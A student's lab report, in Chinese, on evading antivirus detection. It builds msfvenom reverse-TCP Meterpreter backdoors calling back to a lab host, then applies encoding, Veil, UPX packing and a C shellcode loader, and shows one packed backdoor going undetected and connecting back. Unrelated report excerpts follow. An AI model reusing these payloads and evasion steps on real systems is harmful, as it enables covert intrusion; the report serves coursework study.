20212427 2023-20234-2 《网络与系统攻防技术》实验三实验报告

20212427王伟 2024-04-03 18:06:46

目录

  • 1.实验内容
  • 1.1 实验目的
  • 1.2 实验基础问题
  • 2.实验过程
  • 2.1 使用msf编码器进行编码
  • 2.1.1 不进行编码查杀
  • 2.1.2 进行编码一次后检测
  • 2.1.3 进行24次编码后检测
  • 2.1.4 生成php文件并进行检测
  • 2.1.5 生产jar文件并进行检测
  • 2.2 veil,加壳工具实践
  • 2.2.1 veil工具安装
  • 2.2.2 使用veil对程序进行加壳
  • 2.3 使用C + shellcode编程
  • 2.4 通过组合应用各种技术实现恶意代码免杀
  • 2.5 用另一台主机进行测试并回连
  • 3.问题及解决方案
  • 4.学习收获

1.实验内容

1.1 实验目的

使用msf编码器和veil-evasion工具,结合各种免杀措施使得自己编码的shellcode逃过杀毒软件。

1.2 实验基础问题

(1)杀软是如何检测出恶意代码的?
答:
特征匹配: 杀软使用已知的恶意代码特征库进行匹配,这些特征可能是病毒、蠕虫、木马等恶意代码的特定字符串、行为模式或者代码片段。
行为分析: 杀软监视程序的行为,当程序尝试执行可疑操作时,比如修改系统文件、向外部服务器发送数据、试图访问敏感信息等,杀软就会将其标记为潜在的恶意代码。

(2)免杀是做什么?
答:"免杀"是指恶意软件开发者采取各种技术手段,使其恶意软件能够绕过杀毒软件和其他安全防御机制的检测和防御,从而成功地在目标系统上执行。

(3)免杀的基本方法有哪些?
答:代码混淆: 通过重命名变量、函数和类名,修改代码结构,添加无用代码等方式来使代码难以被静态分析和检测。
自修改代码: 恶意软件在每次运行时修改自身的代码,以使其不断变化,从而绕过基于固定模式的检测方法。
多层打包: 使用多层压缩和打包技术,使得恶意代码的结构更加复杂和难以分析。

2.实验过程

2.1 使用msf编码器进行编码

2.1.1 不进行编码查杀

我们使用virustoal进行查杀:
virustoal官网

直接使用实验二中生成的backdoor.exe送去检测

在这里插入图片描述

发现几乎有四分之三都能够被检测出来。

2.1.2 进行编码一次后检测

使用msf对backdoor.exe进行编码,命令如下:

msfvenom -p windows/meterpreter/reverse_tcp -e x86/unicode_mixed -b ‘\x00’ LHOST=192.168.174.135 LPORT=2427 -f exe > 20212427backdoor.exe

在这里插入图片描述

我们把这个程序再送去检测

在这里插入图片描述


发现没什么变化,可见一次编码对我们的后门程序并没有什么成效。

2.1.3 进行24次编码后检测

对我们刚才编码过的程序再进行23次编码,命令如下:

msfvenom -p windows/meterpreter/reverse_tcp -e x86/unicode_mixed -i -23 -b ‘\x00’ LHOST=192.168.174.135 LPORT=2427 -f exe > 20212427backdoor.exe

在这里插入图片描述

我们把这个程序再送去检测

在这里插入图片描述

好像依旧没有什么用,所以我们大致可以得出结论,反复编码这种免杀技术对于现在的杀毒程序用处不大。

2.1.4 生成php文件并进行检测

输入如下指令生成php文件:

msfvenom -p php/meterpreter/reverse_tcp LHOST=192.168.174.135 LPORT=2427 x> 20212427backdoor.php

在这里插入图片描述

我们再把这个程序再送去检测

在这里插入图片描述

可以发现被检测到的部分大大下降,说明这种法师还是很有效果的,但是依旧能被查出来。

2.1.5 生产jar文件并进行检测

输入如下命令生产jar文件:

msfvenom -p java/shell_reverse_tcp  LHOST=192.168.174.135 LPORT=2427 -f jar > 20212427backdoor.jar

我们再把这个程序再送去检测

在这里插入图片描述

发现对比反复编码而言是有所降低,
所以经过反复对比,这几种免杀技巧中,依效果来讲,php>jar>反复编码。

2.2 veil,加壳工具实践

2.2.1 veil工具安装

这一步会出很多的问题,可以说这次实验中花费时间和精力最多的就是这一步,详细的可以看第三部分的问题及解决方案,我在那里写了较为详细的步骤。

首先是安装,在root下输入如下命令:

apt-get install veil-evasion

这里有简单的安装教程
免杀Payload生成工具Veil的下载与使用

等待安装,时间会比较长,安装成功后再次输入veil启动程序:

在这里插入图片描述

2.2.2 使用veil对程序进行加壳

进入veil后,相继输入如下命令,进入evasion并配置IP和端口

use evasion                    //进入Evil—Evasion
use c/meterpreter/rev_tcp.py     //进入配置界面
set LHOST 192.168.174.140        //设置反弹链接ip,此处为Kali的ip
set LPORT 2427                //设置端口
generate

use evasion


在这里插入图片描述


在这里插入图片描述

我们在这里对我们所生成的文件进行命名,命名为20212427veil。
然后我们可以看到我们文件的保存目录
/var/lib/veil/output/compiled/20212427veil.exe

在这里插入图片描述

我们找到我们的保存的文件,然后拿去送检:

在这里插入图片描述


在这里插入图片描述

效果一般。。所以我们对其进行加壳,输入如下命令:

upx 20212427veil.exe -o 20212427veil_upx.exe

在这里插入图片描述

我们找到我们的保存的文件,然后拿去送检:

在这里插入图片描述


在这里插入图片描述


加壳后甚至多检测出来两个,说明主流加壳方式的特征码被研究得差不多了,免杀效果不太行。

2.3 使用C + shellcode编程

我们照常使用msfvenom得到shellcode,命令如下:

msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.174.140 LPORT=2427 -f c

在这里插入图片描述

然后我们将这段shellcode复制,输入:

vim shellcode_c.c

再将刚刚复制的内容插入到新建的.c文件中,并在末尾加上:

int main() { int (*func)() = (int(*)())buf; func(); }

在这里插入图片描述

然后esc,:wq保存退出。
写好.c文件后,输入如下命令将其编译成可执行文件:

i686-w64-mingw32-g++ shellcode_c.c -o shellcode_c.exe

在这里插入图片描述

然后我们再送去检测

在这里插入图片描述

2.4 通过组合应用各种技术实现恶意代码免杀

我们选择使用python+aes_encrypt
打开veil,选择Evasion

use 1

在这里插入图片描述

list一下查看我们需要使用的技术
我们选择evasion中第28项:用python生成reverse_tcp

在这里插入图片描述


输入

use 28

设置回弹IP和端口号

set LHOST 192.168.174.140        //设置反弹链接ip,此处为Kali的ip
set LPORT 2427                //设置端口
generate

在这里插入图片描述

生成成功后我们找到这个20212427payload.py文件并把它拿去检测

在这里插入图片描述

2.5 用另一台主机进行测试并回连

我们进入veil使用7号payload即c/meterpreter/rev_tcp并加壳

在这里插入图片描述

在这里插入图片描述

我们把它传回主机,送去给联想电脑管家并打开查杀试试可不可以被查出来
我们把它找一个文件夹放置

在这里插入图片描述

打开联想电脑管家扫描

在这里插入图片描述

竟然没有被查出来!
那我们用它来实现回连,回顾和实验二同样的步骤,打开msf

在这里插入图片描述

回连成功!

3.问题及解决方案

关于veil的安装问题
解决方案:这个问题真的困扰了我很久,我甚至一度认为这个和实验者的运气有关(?
我一直卡死在veil安装中卡死在python的安装界面,一直next就会被卡住。
我选择重新切换了一个版本的虚拟机,但我并不确定这个是不是核心。
但是真正解决问题的是我更换了kali的下载源,我多次尝试发现kali的下载源根本用不了,一开始下载就会erro,我的解决办法可以参考如下的博客。
先换源
Kali更新源签名无效问题
换签名
kali更新源以及如何解决kali中无法下载 http://http.kali.org/kali/dists/kali-rolling/InRelease 无法解析域名“kali.download”
最后sudo update
这样就可以正常安装了。

4.学习收获

本次实验关于操作部分基本上没什么难点,问题都在veil的安装,着实让人头疼,在通过我和同学们的讨论探索后,还是解决了这个问题,从这往后一路畅通。这次我们等于是对之前后门实践的一种强化。之前后门软件需要执行必须关掉杀软,否则被传过去会直接被杀掉。而这回经过加密、加壳和编码的一系列技术,我的后门软件居然逃过了杀软的检索成为了绿色软件(?瞬间感觉很神奇,我觉得学习了这些技术非常有趣也能激起我的兴趣,我有点期待后面的实验内容了。

...全文
43 回复 打赏 收藏 转发到动态 举报
写回复
用AI写文章
回复
切换为时间正序
请发表友善的回复…
发表回复
网络信息安全综合实验 任 务 书 一、 目的与要求 根据实验内容的要求和实验安排,要求学生在掌握网络信息安全基本知识的基础上, 能够设计出相应的软件,并且熟练地运用各种网络信息安全技术和手段,发现并解决各 类安全问题,维护网络及操作系统的安全。 二、 主要内容 实验一加密认证通信系统实现 设计实现一个通信系统,双方可以通过消息和文件通信,用户可选择一种加密算法和 认证算法,对消息和文件进行加密通信和完整性验证。(要实现认证和加密,工具和语 言不限,可以直接调用现有模块,认证和加密不限) 实验二 综合扫描及安全评估 利用常见的一些扫描工具可以检测本系统及其它系统是否存在漏洞等安全隐患,给出 全面而完善的评估报告,帮助管理员发现存在的问题,进而采取有力措施予以弥补,从 而提高系统的安全性能。 实验三 网络攻防技术 矛与盾的关系告诉我们,在研究网络安全技术时,只着眼于安全防范技术是远远不够 的,知己知彼方能百战不殆,因此,很有必要同时研究攻击与防范技术,才能更有效地 解决各种威胁。 实验四 Windows系统安全配置方案 作为网络节点,操作系统安全成为网络信息安全首先应予考虑的事务,然而人们往往 忽视了OS的安全性。其实,OS的安全不只体现在密码口令上,这仅仅是最基本的一个方 面。除此之外,服务、端口、共享资源以及各种应用都很有可能存在着安全隐患,因此 ,应采取相应措施设置完善的本地安全策略,并使用防病毒软件、防火墙软件甚至入侵 检测软件来加强系统的安全。 其中实验一要求编程实现,可直接调用相关功能函数完成。实验二至实验四可在机房 的网络信息安全综合实验系统上完成。 三、 进度计划 "序号 "设计(实验)内容 "完成时间 "备注 " "1 "接受任务,查阅文献,开始实 "第一天 " " " "现密码算法和认证算法 " " " "2 "完成加密认证通信系统 "第二至七天 " " "3 "上午完成综合扫描及安全评估 "第八天 " " " "实验,下午进行网络攻防实验 " " " "4 "上午完成网络攻防实验,下午 "第九天 " " " "进行系统安全配置实验 " " " "5 "撰写实验报告并验收 "第十天 " " 四、 实验成果要求 1. 要求程序能正常运行,并实现任务书要求功能。 2. 完成实验报告,要求格式规范,内容具体而翔实,应体现自身所作的工作,注重 对设计思路的归纳和对问题解决过程的总结。 五、 考核方式 平时成绩+程序验收+实验报告。 学生姓名: 指导教师: 2016 年 6 月 13 日 实验报告 题 目: 网络信息安全综合实验 院 系:计算机系 班 级: 学 号: 学生姓名: 指导教师: 成 绩: 实验日期:2021 年 6 月 一、 目的与要求 根据实验内容的要求和实验安排,要求学生在掌握网络信息安全基本知识的基础上, 能够设计出相应的软件,并且熟练地运用各种网络信息安全技术和手段,发现并解决各 类安全问题,维护网络及操作系统的安全。 二、 实验内容 设计实现一个通信系统,双方可以通过消息和文件通信,用户可选择一种加密算法和 认证算法,对消息和文件进行加密通信和完整性验证。(要实现认证和加密,工具和语 言不限,可以直接调用现有模块,认证和加密不限) 三、实验结果 实验一:本通信系统为用C#语言编写的P2P方式通信的系统,其具体功能如下: 1、识别本机IP地址并赋值到文本框中,产生一个随机数作为端口号,端口号范围限制在 1000到65535之间。 2、通过运用网络编程的知识尝试用产生的IP与端口号进行监听。 图1 发送方界面 图2 接收方界面 3、设置刷新区域,定时刷新好友在线,可以设置刷新间隔,启动和停止刷新。这里 可以通过拖拽VS里自带的控件"timersecond",实现计时。 4、发送消息。消息的传送是具有加密与认证的。 加密:考虑到DES的安全性问题,加密消息是采用AES方式加密的,本系统采用的是 C#封装好的AES程序,调用接口,实现对明文的加密。解密同理。 认证:认证是将明文哈希散列后采用RSA算法对其进行签名,再用公钥加密进行认证 的,其中哈希散列采用的是SHA1方式。下图为加密与认证的具体流程。 图3 加密与认证流程 图4 发送方可显示明文与密文 图5接收方解密出明文 5、可以发送文件。通过获取文本框中的文件地址,建立文件流,向接收端发送文件 。 接收端进行文件监听,接收文件,与发送文件编写过程相似,只是把"写"换成了"读"文 件。VS里自带的控件"saveFileDialog"可以帮助用户提示选择保存文件的位置。 图6 输入文件位置 图7 询问是否接受文件 图8 接收与发送文件成功 实验二:认识性实验 本实验为认识练习信息安全实验平台的部分实验。 SuperScan端口扫描实验 扫描结果如下图: 图
网络安全实验 石河子大学信息科学与技术学院 网络安全课程实验 "实验名称: "使用任选工具进行网络检测与扫描 " "学生姓名: "刘金红 " " "学 号: "05 " " "学 院: "信息科学与技术学院 " "专业年级: "计算机科学与技术专业2012级 " "指导教师: "曹传东老师 " "完成日期: " " 目录 1 实验环境 3 2 实验目的 3 3 实验步骤 3 4 实验内容 4 DOS窗口中常用网络命令的操作使用及IPCS攻击实践 4 DOS窗口中ping 命令及其常见带参数子命令的用法实践 4 DOS窗口中IPconfig 命令及其常见带参数子命令的用法实践 6 DOS窗口中nslookup命令及其常见带参数子命令的用法实践 8 DOS窗口中netstat命令及其常见带参数子命令的用法实践 10 DOS窗口中arp命令及其常见带参数子命令的用法实践 12 DOS窗口中route命令及其常见带参数子命令的用法实践 13 DOS窗口中tracert命令及其常见带参数子命令的用法实践 14 DOS窗口中ftp命令及其常见带参数子命令的用法实践 15 DOS窗口中telnet命令及其常见带参数子命令的用法实践 16 DOS窗口中sc命令及其常见带参数子命令的用法实践 20 DOS窗口中nbtstat命令及其常见带参数子命令的用法实践 22 DOS窗口中net命令及其常见带参数子命令的用法实践 24 DOS窗口中at命令及其常见带参数子命令的用法实践 25 使用课本第四章各案例中介绍的工具软件进行网络信息收集和扫描检测 25 在虚拟机系统Window200x中使用GetNTuser工具扫描本机系统上存在的用户名, 并猜解其中具有空密码和弱口令的用户;在该软件中使用自定义字典文件穷举猜 解某个用户的口令(爆破); 25 使用Port Scan 工具软件进行对某目标机开放端口的扫描; 28 在虚拟机系统中使用Shed 工具软件扫描某个目标主机的共享目录信息; 31 编译执行课本中案例4-4介绍的代码,并利用抓包工具进行验证; 32 使用漏洞扫描工具X-Scan对指定IP 地址段或单机进行全面的安全漏洞扫描和检测; 36 使用嗅探工具Win Sniffer 监听客户端登陆FTP服务器的用户和密码信息; 39 使用自选的任一款扫描工具进行网络攻击前的信息收集 42 使用CIS工具对本机系统进行安全风险评估 42 使用Superscan扫描工具实现秘密端口扫描 44 实验一:使用任选工具软件进行网络检测和扫描 1 实验环境 1台带有活动网络连接(插有网卡且工作正常)、安装有VMware虚拟机软件的PC机,其中 主机环境配置如表1-1所示: 表1-1 本机环境:主机操作系统的配置(作为客户机端) "操作系统 "Windows系列操作系统,版本均可,推荐Win7/Windows XP " "Telnet客户端 "F-Term(版本不限)或 " "工具 " " "FTP客户端工具"Cute FTP pro/Flash FXP (版本不限)或 " "Web浏览器 "IE/Mozilla FireFox(版本不限)或其他浏览器软件 " "抓包软件 "Sniffer Pro 支持千兆网卡) " "屏幕截图工具 "HyperSnap-DX (可抓滚屏的单文件版本) " "IP地址 " (机房做的) (后来改了) " 虚拟机配置如下表1-2所示: 表1-2 虚拟机环境:虚拟机操作系统的配置(作为服务器端) "操作系统 "Windows 200X Advance " " "Server,且安装配置了WWW/FTP/DNS/Telnet等网络服务 " "IP地址 " " 2 实验目的 1. 通过该实验,掌握在DOS命令窗口中常用网络命令的使用方法; 2. 通过该实验,掌握利用教程第四章介绍的各个案例中的工具软件进行网络检测扫描的 基本方法; 3. 通过该实验,掌握使用自选的一款工具软件进行网络攻击前的信息收集的基本方法; 4. 进一步加深对TCP/IP协议的理解和认识; 3 实验步骤 1. 实验前先阅读材料相关章节以及实验一参考资料(PPT及命令简介文档、实验指导书) ,充分预习,了解实验步骤并准备相关的工具软件; 2. 每个人在自己的本机系统上安装各种工具软件,以自己的虚拟机系统作为扫描目标; 3. 在各工具软件中分别进行参数设置,以实现客户机端获取靶机服务器的各种信息; 4. 在虚拟机系统中启动Sniffer Pro 或Wireshark,进行数据包捕获模式,抓取攻防双方的各种通信协议数据包,查看数 据包中的各种敏感扫描信息的报文内容; 5. 独立完成本次实验报告; 6. 实验完成后,思考以下问题,如何防范对方从网络上获得自己机器的各种信息 4
xxxxxxx 学生实习(实训)总结报告 学 院:xxxxxxxxxxxxxxxxxx 专业班级:_xxxxxxxxxx_ 学生姓名:____xxxxxxxxx_____ 学 号:xxxxxxxxxx_ 实习(实训)地点:___xxxxx____ ____________ __ 报告题目:__xxxxxxxxxxxxxxxxxxxx__________ ____ 报告日期: xxx 年 xxx月 xxx日 指导教师评语: ____________ _______________________ ______________________________________________________________________ ______________________________________________________________________ ___________________ 成绩(五级记分制):______ _______ 指导教师(签字):_____________________ xxxxx 实习(实训)任务书 设计题目:数据恢复技术应用 "学生姓名 "xxxxx " "课程名称 "xxxxx "专业班级 "xxxxx " "地 点 "xxxxx "起止时间 "xxxxx " "设 "数据恢复是在系统数据丢失或其他诸多原因而导致的灾难后,快速进" "计 "行数据恢复,以保障系统正常运行的常用手段。通过该综合训练,使" "内 "学生了解数据恢复的重要性,并认识到电磁泄漏现象引起的数据恢复" "容 ",硬件损坏、文件的删除等实现数据恢复的内容。 " "及 "要求:理解数据备份的重要性,以及磁盘数据恢复的原理,认识数据" "要 "恢复技术对信息安全的影响。能够使用数据恢复软件EasyRecovery进" "求 "行文件恢复。 " " "提高要求:能够对磁盘数据进行彻底清除。 " "设 "掌握EasyRecovery的应用; " "计 "理解磁盘分区的原理及特征; " "参 "设计利用EasyRecovery或手动方法进行数据恢复的解决方案。 " "数 " " "进 "12月19-20日:了解设计任务、掌握磁盘分区特征、熟悉工具软件;" "度 "12月21-28日:数据恢复的实施; " "要 "12月29-30日:撰写综合训练总结报告,作品检查、提交、答辩。 " "求 " " "参 "[1] 吴灏.《网络攻防技术》[M].北京:机械工业出版社,2009. " "考 "[2]胡建伟.《网络安全与保密》[M]. 西安电子科技大学出版社,2006." "资 "[3]牛少彰,江为强.《网络的攻击于防范——理论与实践》[M]. 北京: " "料 "北京邮电大学出版社,2006. " " "[4] 蒋朝惠. 《信息安全综合实验》[M]. " " "北京:中国铁道出版社,2010. " " "[5] 蒋朝惠. 《信息安全原理与技术》[M]. " " "北京:中国铁道出版社,2009. " "其 " " "它 " " "说 " " "明 "1.本表应在每次实施前一周由负责教师填写二份,院系审批后交院 " " "系办备案,一份由负责教师留用。2.若填写内容较多可另纸附后。3" " ".一题多名学生共用的,在设计内容、参数、要求等方面应有所区别 " " "。 " 系主任: 指导教师:xxxxx 年 月 日 前言 随着计算机技术的发展,同时硬盘由于其容量大价格便宜也成为人们存储数据的主要 设备。然而由于种种原因,硬盘的数据可能会被损坏,这也给个人和社会带来很大的损 失。因此,数据损坏后的数据恢复显得非常重要。虽然在数据恢复领域有很多的厂商已 经有比较成熟的技术。然而对于并不了解硬盘原理普通人来说,如果试图恢复数据,但 又无法采用很好的方法,选择正确的工具,就很难很好的恢复数据。然而不管用什么方 法进行数据恢复,都不能保证100%的能成功,所以在使用电脑时,我们应该注意数据备 份工作。 本文分析了硬盘的有关内部结构与文件存储系统以及硬盘数据损坏的有关原因,然后 介绍如何使用数据恢复软件EasyRecovery进行文件恢复。 目录 前言 I 1 设计内容及要求 1 实训内容 1 实训要求 1 2 数据恢复原理 2 3 数据恢复常见实例 4 主引导区的恢复 4 分区表破坏修复 5 DBR修复 5 文件删除后的修复 6 因病毒侵害而导致的文件丢失 6 利用EasyRecovery恢复丢失文件 7 4 总结 14 致谢 15 参考文献 16 1 设计内容及要求 硬盘数据丢失对于硬盘来说,仅仅就是硬盘上的某些地方的磁性消失。硬盘数据的丢 失的原因本来就有很多种,可能因为人的误操作而丢失,也可能是因为病毒的入侵而破 坏数据。并且

69

社区成员

发帖
与我相关
我的任务
社区描述
网络攻防作业
网络安全 高校
社区管理员
  • blackwall0321
加入社区
  • 近7日
  • 近30日
  • 至今
社区公告
暂无公告

试试用AI创作助手写篇文章吧